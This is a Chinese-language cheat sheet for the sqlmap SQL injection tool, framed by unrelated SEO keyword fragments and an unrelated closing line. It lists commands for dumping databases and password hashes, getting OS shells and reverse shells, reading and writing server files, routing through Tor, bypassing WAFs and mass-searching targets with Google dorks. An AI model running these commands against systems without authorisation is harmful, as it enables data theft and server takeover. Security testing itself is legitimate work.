网站是否开启gzip,婚纱网站设计目标,电子商务网站环境建设,上海百度优化文章目录 实际使用案例常用命令基本命令数据库指纹识别用户信息用户权限数据库枚举数据导出密码哈希操作系统命令执行文件操作代理和网络参数指定保存恢复自动搜索注入智能模式等级设置自动注入WAF 绕过杂项帮助和支持 SQLmap 是一款开源的自动化 SQL 注入检测和利用工具#… 文章目录 实际使用案例常用命令基本命令数据库指纹识别用户信息用户权限数据库枚举数据导出密码哈希操作系统命令执行文件操作代理和网络参数指定保存恢复自动搜索注入智能模式等级设置自动注入WAF 绕过杂项帮助和支持 SQLmap 是一款开源的自动化 SQL 注入检测和利用工具广泛用于网络安全的渗透测试中。它支持广泛的数据库服务器能够自动化地检测和利用大多数的 SQL 注入漏洞以及对数据库服务器进行不同程度的访问和控制。 实际使用案例
假设你已经确定一个 URL 存在 SQL 注入漏洞你可以使用以下命令来进一步探测和利用它
sqlmap -u http://example.com/index.php?id1 --dbs这个命令会列出所有数据库。
接下来如果你想获取特定数据库中的所有表名
sqlmap -u http://example.com/index.php?id1 -D database_name --tables若要导出某个表的数据
sqlmap -u http://example.com/index.php?id1 -D database_name -T table_name --dump常用命令
以下是 SQLmap 的一些重要命令和功能
基本命令
sqlmap -u TARGET_URL对指定的 URL 进行注入测试。
数据库指纹识别
--banner获取数据库的详细信息。--dbms Mysql指定数据库类型。
用户信息
--users列出数据库中的所有用户。--current-user确定当前连接的数据库用户。--is-dba检查当前用户是否具有数据库管理员权限。
用户权限
--privileges列出数据库用户的权限。--privileges -U root查看指定用户权限。
数据库枚举
--dbs列出所有数据库。-D DATABASE_NAME --tables列出指定数据库的所有表。-D DATABASE_NAME -T TABLE_NAME --columns列出指定表的所有列。--start 1 --stop 20列出 20 条。
数据导出
-D DATABASE_NAME -T TABLE_NAME -C COLUMN_NAME --dump导出指定数据库、表或列的数据。
密码哈希
--passwords尝试获取数据库用户的密码哈希。
操作系统命令执行
--os-cmdCOMMAND在支持的数据库上执行操作系统命令。--os-shell提供一个交互式的 shell 环境。--udf-inject导入用户自定义函数获取系统权限。--os-pwn 反弹 shell。
文件操作
--file-readFILE_PATH从数据库服务器读取文件。--file-writeFILE_PATH --file-destDEST_PATH将文件写入数据库服务器。--reg-read 读取 win 系统注册表
代理和网络
--proxyPROXY通过指定的代理服务器进行 SQLmap 的所有请求。--tor使用 Tor 匿名网络。--delayDELAY_SECONDS设置请求之间的延迟时间。--timeoutTIMEOUT_SECONDS设置请求的超时时间。
参数指定
--stringSTRING_ON_TRUE_PAGE指定关键词。--data id3 设置post参数。--cookie COOKIE_VALUE 设置cookie。--random-agent使用随机 User-Agent 头发送请求。--sql-shell 执行指定 sql 命令
保存恢复
--dbs-o sqlmap.log保存进度。--dbs -o sqlmap.log --resume恢复进度。
自动搜索注入
sqlmap -g google 语法 --dump-all --batch搜索注入点自动 跑出所有字段。
智能模式
--smart启用智能模式使用更少的查询来确定数据库的类型以及数据库中表和字段的名称。
等级设置
--level这个选项用来定义测试的级别。
自动注入
--batch无需交互自动执行。
WAF 绕过
--tamperTAMPER_SCRIPTS使用篡改脚本来尝试绕过 WAF。
杂项
--beep发现 SQL 注入时发出蜂鸣声。--check-payload检查 IDS 对注入有效负载的检测。--forms解析和测试目标 URL 的表单。
帮助和支持
sqlmap -h 或 sqlmap --help显示帮助信息。sqlmap -v显示程序的版本号。 想要成为无论多么悲伤的时候也能够漂亮微笑的人吧。
